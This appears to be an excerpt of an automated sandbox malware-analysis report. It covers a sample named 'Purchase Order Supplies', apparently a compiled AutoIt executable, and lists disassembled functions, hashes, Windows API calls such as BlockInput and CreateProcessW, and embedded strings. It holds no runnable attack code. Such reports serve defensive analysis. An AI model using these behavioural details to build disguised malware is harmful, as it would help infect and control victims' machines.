                          • API String ID: 3192549508-0
                          • Opcode ID: 0190dc6b1403832cf2bd562cd505f425b11946f2ba2a7745118d79f62bf528e3
                          • Instruction ID: fb516abd6a5d635130aac581781611b304d715005d66001e5cbfad069d9a2d09
                          • Opcode Fuzzy Hash: 0190dc6b1403832cf2bd562cd505f425b11946f2ba2a7745118d79f62bf528e3
                          • Instruction Fuzzy Hash: 80B09271044B08BBEA002BA1EC09BC83F6AEB08A62F008010F62D84260CF6354528AA2
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2e07c2a3204044c32beb53fabb95e1b86f26f2d2c4a68afaf728257cd9bacf02
                          • Instruction ID: e7579aafc28592710ec8dd7acbb5c721fe3045a3765b741ee5c85098c090a1f5
                          • Opcode Fuzzy Hash: 2e07c2a3204044c32beb53fabb95e1b86f26f2d2c4a68afaf728257cd9bacf02
                          • Instruction Fuzzy Hash: 51B1E120D2AF414DD6239639DD31336B65CAFBB2D5F91D71BFC2AB4E26EB2185834180
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00D00352
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 636b802f86da9762ba5c84b4822b3b8af17badf27e21167cfd2aec85404d0b22
                          • Instruction ID: 1fc22d6000f87577430e8f94fb7f29da9c91aad63ef5175b52307ea8fae4598f
                          • Opcode Fuzzy Hash: 636b802f86da9762ba5c84b4822b3b8af17badf27e21167cfd2aec85404d0b22
                          • Instruction Fuzzy Hash: E1110A31244219BBFB265B2CCC45FBD3E25E745760F288315FA5A9A1E2CAA09D01E279
                          APIs
                            • Part of subcall function 00CAB155: GetWindowLongW.USER32(?,000000EB), ref: 00CAB166
                          • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 00CFE7AF
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$CallLongProc
                          • String ID:
                          • API String ID: 4084987330-0
                          • Opcode ID: 8bac1d1077000881fde09b36dc9a0b079b435b95d115949b1a9ebd423556f00a
                          • Instruction ID: b766112f8f931697de19c42726e7192b5df5babf36efff76a70e44b2895a498c
                          • Opcode Fuzzy Hash: 8bac1d1077000881fde09b36dc9a0b079b435b95d115949b1a9ebd423556f00a
                          • Instruction Fuzzy Hash: C6F0FF3510020CFFCF55AF55DC44DB93BA7EB05361B048515FE258A6B1CB329D61EB61
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                            • Part of subcall function 00CAB736: GetCursorPos.USER32(000000FF), ref: 00CAB749
                            • Part of subcall function 00CAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00CAB766
                            • Part of subcall function 00CAB736: GetAsyncKeyState.USER32(00000001), ref: 00CAB78B
                            • Part of subcall function 00CAB736: GetAsyncKeyState.USER32(00000002), ref: 00CAB799
                          • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00D0F417,?,?,?,?,?,00000001,?), ref: 00CFEA9C
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                          • String ID:
                          • API String ID: 2356834413-0
                          • Opcode ID: 425d87b865abec1b2056727819c6c16abc80c79e90e29505be5daffc9ef54282
                          • Instruction ID: 861be54c00ac9b56ca753f87fceb0758986158fffd2ef0083d61d35a57768a49
                          • Opcode Fuzzy Hash: 425d87b865abec1b2056727819c6c16abc80c79e90e29505be5daffc9ef54282
                          • Instruction Fuzzy Hash: 94F0A735100329BBDF146F15CC05EBE3F61FB01755F004015FD165A2A1D7769961EBE1
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,00CAAF40,?,?,?,?,?), ref: 00CAB83B
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 1bfba0517584069c8fb5086bfb5f00a94540cc39e7e8310fc3d728192073d588
                          • Instruction ID: 5f6e21aed2f3d72012a751651d1e351bc1cb13e7b77798bf6def3abd228784b5
                          • Opcode Fuzzy Hash: 1bfba0517584069c8fb5086bfb5f00a94540cc39e7e8310fc3d728192073d588
                          • Instruction Fuzzy Hash: 66F05434500309AFDB289F18DC50A753BA6F705361F144219FD52873E1D771DD50DB60
                          APIs
                          • BlockInput.USER32(00000001), ref: 00CE7057
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: BlockInput
                          • String ID:
                          • API String ID: 3456056419-0
                          • Opcode ID: 2e63da5046c47b29844512ddff6498c619af434f163342095b873b99884330f5
                          • Instruction ID: ecb57b29c19ae544127600d9e93be0eae93bc5993ebffc18745ced7b60469ea6
                          • Opcode Fuzzy Hash: 2e63da5046c47b29844512ddff6498c619af434f163342095b873b99884330f5
                          • Instruction Fuzzy Hash: 04E04F36304214AFC710EFAAD808E96F7EDAF98750F00C42AFA45D7351DBB0E8009BA0
                          APIs
                          • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00CFF41A
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: DialogNtdllProc_
                          • String ID:
                          • API String ID: 3239928679-0
                          • Opcode ID: 60b8f33b874e72bcf7109d66bd249de9dfbfb6c99af13bd5bc06951ebd3e1342
                          • Instruction ID: ba5c6ccf2ff050c8f847887ac184e23d7034a604c3f350c4482b7ec2bf3c6cca
                          • Opcode Fuzzy Hash: 60b8f33b874e72bcf7109d66bd249de9dfbfb6c99af13bd5bc06951ebd3e1342
                          • Instruction Fuzzy Hash: 1FF06D31240359BFDB21DF58DC05FD63FA5FB06760F048418BA25672E1CB716920E765
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                          • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 00CAACC7
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: c8a7e98dfd5701593cd9b330dd36ebc9a85463b17f5ce1ad21b52ec308d2df95
                          • Instruction ID: 82b117163dca1c5256ab19de514e28abbfd9aa40986871855e690fd2f96b42dd
                          • Opcode Fuzzy Hash: c8a7e98dfd5701593cd9b330dd36ebc9a85463b17f5ce1ad21b52ec308d2df95
                          • Instruction Fuzzy Hash: C2E0B635140208BBDF15AF90DC51E683B26BB4A358F108418FA054A2A1CB33A522EB61
                          APIs
                          • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00D0F3D4,?,?,?,?,?,?), ref: 00CFF450
                            • Part of subcall function 00CFE13E: _memset.LIBCMT ref: 00CFE14D
                            • Part of subcall function 00CFE13E: _memset.LIBCMT ref: 00CFE15C
                            • Part of subcall function 00CFE13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D53EE0,00D53F24), ref: 00CFE18B
                            • Part of subcall function 00CFE13E: CloseHandle.KERNEL32 ref: 00CFE19D
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                          • String ID:
                          • API String ID: 2364484715-0
                          APIs
                          • NtdllDialogWndProc_W.NTDLL ref: 00CFF3D0
                          Similarity
                          • API ID: DialogNtdllProc_
                          • String ID:
                          • API String ID: 3239928679-0
                          APIs
                          • NtdllDialogWndProc_W.NTDLL ref: 00CFF3A1
                          Similarity
                          • API ID: DialogNtdllProc_
                          • String ID:
                          • API String ID: 3239928679-0
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                            • Part of subcall function 00CAB86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00CAB85B), ref: 00CAB926
                            • Part of subcall function 00CAB86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,00CAB85B,00000000,?,?,00CAAF1E,?,?), ref: 00CAB9BD
                          • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00CAAF1E,?,?), ref: 00CAB864
                          Similarity
                          • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                          • String ID:
                          • API String ID: 2797419724-0
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00CB8E1F
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          APIs
                          • GetProcessHeap.KERNEL32(00CB6AE9,00D467D8,00000014), ref: 00CBA937
                          Similarity
                          • API ID: HeapProcess
                          • String ID:
                          • API String ID: 54951025-0
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00CEA7A5
                          • DeleteObject.GDI32(00000000), ref: 00CEA7B7
                          • DestroyWindow.USER32 ref: 00CEA7C5
                          • GetDesktopWindow.USER32 ref: 00CEA7DF
                          • GetWindowRect.USER32(00000000), ref: 00CEA7E6
                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00CEA927
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00CEA937
                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA97F
                          • GetClientRect.USER32(00000000,?), ref: 00CEA98B
                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00CEA9C5
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA9E7
                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA9FA
                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEAA05
                          • GlobalLock.KERNEL32(00000000), ref: 00CEAA0E
                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEAA1D
                          • GlobalUnlock.KERNEL32(00000000), ref: 00CEAA26
                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEAA2D
                          • GlobalFree.KERNEL32(00000000), ref: 00CEAA38
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 00CEAA4A
                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00D1D9BC,00000000), ref: 00CEAA60
                          • GlobalFree.KERNEL32(00000000), ref: 00CEAA70
                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00CEAA96
                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00CEAAB5
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEAAD7
                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEACC4
                          Similarity
                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                          • String ID: $AutoIt v3$DISPLAY$static
                          • API String ID: 2211948467-2373415609
                          APIs
                          • SetTextColor.GDI32(?,00000000), ref: 00CFD0EB
                          • GetSysColorBrush.USER32(0000000F), ref: 00CFD11C
                          • GetSysColor.USER32(0000000F), ref: 00CFD128
                          • SetBkColor.GDI32(?,000000FF), ref: 00CFD142
                          • SelectObject.GDI32(?,00000000), ref: 00CFD151
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00CFD17C
                          • GetSysColor.USER32(00000010), ref: 00CFD184
                          • CreateSolidBrush.GDI32(00000000), ref: 00CFD18B
                          • FrameRect.USER32(?,?,00000000), ref: 00CFD19A
                          • DeleteObject.GDI32(00000000), ref: 00CFD1A1
                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00CFD1EC
                          • FillRect.USER32(?,?,00000000), ref: 00CFD21E
                          • GetWindowLongW.USER32(?,000000F0), ref: 00CFD249
                            • Part of subcall function 00CFD385: GetSysColor.USER32(00000012), ref: 00CFD3BE
                            • Part of subcall function 00CFD385: SetTextColor.GDI32(?,?), ref: 00CFD3C2
                            • Part of subcall function 00CFD385: GetSysColorBrush.USER32(0000000F), ref: 00CFD3D8
                            • Part of subcall function 00CFD385: GetSysColor.USER32(0000000F), ref: 00CFD3E3
                            • Part of subcall function 00CFD385: GetSysColor.USER32(00000011), ref: 00CFD400
                            • Part of subcall function 00CFD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CFD40E
                            • Part of subcall function 00CFD385: SelectObject.GDI32(?,00000000), ref: 00CFD41F
                            • Part of subcall function 00CFD385: SetBkColor.GDI32(?,00000000), ref: 00CFD428
                            • Part of subcall function 00CFD385: SelectObject.GDI32(?,?), ref: 00CFD435
                            • Part of subcall function 00CFD385: InflateRect.USER32(?,000000FF,000000FF), ref: 00CFD454
                            • Part of subcall function 00CFD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CFD46B
                            • Part of subcall function 00CFD385: GetWindowLongW.USER32(00000000,000000F0), ref: 00CFD480
                            • Part of subcall function 00CFD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CFD4A8
                          Similarity
                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                          • String ID:
                          • API String ID: 3521893082-0
                          APIs
                          • DestroyWindow.USER32(00000000), ref: 00CEA42A
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00CEA4E9
                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00CEA527
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00CEA539
                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00CEA57F
                          • GetClientRect.USER32(00000000,?), ref: 00CEA58B
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00CEA5CF
                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CEA5DE
                          • GetStockObject.GDI32(00000011), ref: 00CEA5EE
                          • SelectObject.GDI32(00000000,00000000), ref: 00CEA5F2
                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00CEA602
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CEA60B
                          • DeleteDC.GDI32(00000000), ref: 00CEA614
                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00CEA642
                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00CEA659
                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00CEA694
                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00CEA6A8
                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00CEA6B9
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00CEA6E9
                          • GetStockObject.GDI32(00000011), ref: 00CEA6F4
                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00CEA6FF
                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00CEA709
                          Similarity
                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                          • API String ID: 2910397461-517079104
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00CDE45E
                          • GetDriveTypeW.KERNEL32(?,00D2DC88,?,\\.\,00D2DBF0), ref: 00CDE54B
                          • SetErrorMode.KERNEL32(00000000,00D2DC88,?,\\.\,00D2DBF0), ref: 00CDE6B1
                          Strings
                          Similarity
                          • API ID: ErrorMode$DriveType
                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                          • API String ID: 2907320926-4222207086
                          APIs
                          Strings
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                          • API String ID: 1038674560-86951937
                          APIs
                          • DestroyWindow.USER32 ref: 00C94956
                          • DeleteObject.GDI32(00000000), ref: 00C94998
                          • DeleteObject.GDI32(00000000), ref: 00C949A3
                          • DestroyCursor.USER32(00000000), ref: 00C949AE
                          • DestroyWindow.USER32(00000000), ref: 00C949B9
                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00D0E179
                          • 6FB00200.COMCTL32(?,000000FF,?), ref: 00D0E1B2
                          • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00D0E5E0
                            • Part of subcall function 00C949CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C94954,00000000), ref: 00C94A23
                          • SendMessageW.USER32 ref: 00D0E627
                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00D0E63E
                          Strings
                          Similarity
                          • API ID: DestroyMessageSendWindow$DeleteObject$B00200CursorInvalidateMoveRect
                          • String ID: 0
                          • API String ID: 3209014489-4108050209
                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00CFC598
                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00CFC64E
                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 00CFC669
                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00CFC925
                          Strings
                          Similarity
                          • API ID: MessageSend$Window
                          • String ID: 0
                          • API String ID: 2326795674-4108050209
                          APIs
                          • CharUpperBuffW.USER32(?,?,00D2DBF0), ref: 00CF6245
                          Strings
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                          • API String ID: 3964851224-45149045
                          APIs
                          • GetSysColor.USER32(00000012), ref: 00CFD3BE
                          • SetTextColor.GDI32(?,?), ref: 00CFD3C2
                          • GetSysColorBrush.USER32(0000000F), ref: 00CFD3D8
                          • GetSysColor.USER32(0000000F), ref: 00CFD3E3
                          • CreateSolidBrush.GDI32(?), ref: 00CFD3E8
                          • GetSysColor.USER32(00000011), ref: 00CFD400
                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CFD40E
                          • SelectObject.GDI32(?,00000000), ref: 00CFD41F
                          • SetBkColor.GDI32(?,00000000), ref: 00CFD428
                          • SelectObject.GDI32(?,?), ref: 00CFD435
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00CFD454
                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CFD46B
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00CFD480
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CFD4A8
                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00CFD4CF
                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00CFD4ED
                          • DrawFocusRect.USER32(?,?), ref: 00CFD4F8
                          • GetSysColor.USER32(00000011), ref: 00CFD506
                          • SetTextColor.GDI32(?,00000000), ref: 00CFD50E
                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00CFD522
                          • SelectObject.GDI32(?,00CFD0B5), ref: 00CFD539
                          • DeleteObject.GDI32(?), ref: 00CFD544
                          • SelectObject.GDI32(?,?), ref: 00CFD54A
                          • DeleteObject.GDI32(?), ref: 00CFD54F
                          • SetTextColor.GDI32(?,?), ref: 00CFD555
                          • SetBkColor.GDI32(?,?), ref: 00CFD55F
                          Similarity
                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                          • String ID:
                          • API String ID: 1996641542-0
                          APIs
                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00CFB5C0
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CFB5D1
                          • CharNextW.USER32(0000014E), ref: 00CFB600
                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00CFB641
                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00CFB657
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CFB668
                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00CFB685
                          • SetWindowTextW.USER32(?,0000014E), ref: 00CFB6D7
                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00CFB6ED
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CFB71E
                          • _memset.LIBCMT ref: 00CFB743
                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00CFB78C
                          • _memset.LIBCMT ref: 00CFB7EB
                          • SendMessageW.USER32 ref: 00CFB815
